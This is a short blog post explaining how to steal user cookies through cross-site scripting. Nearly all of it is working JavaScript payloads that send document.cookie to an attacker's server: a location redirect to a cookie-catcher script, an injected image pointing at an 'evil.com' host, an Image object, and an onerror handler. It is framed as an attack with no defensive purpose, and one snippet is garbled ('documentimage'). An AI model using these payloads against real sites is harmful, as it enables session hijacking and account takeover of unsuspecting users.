How to steal user cookies using XSS attack

We know that it is possible to steal the cookie by redirecting to “False” page etc like this

document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookie

But how to do without redirecting the user?

If you have full control of the JavaScript getting written to the page then you could just do

document.write('cookie: ' + document.cookie)

If you want it sent to another server, you could include it in a non-existent image:

document.write('<img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />')

 

Another way is :

documentimage = new Image(); image.src='http://example.com?c='+document.cookie;

One more :

<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>

Uday Ogra

Connect with me at http://facebook.com/tendulkarogra and lets have some healthy discussion :)

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *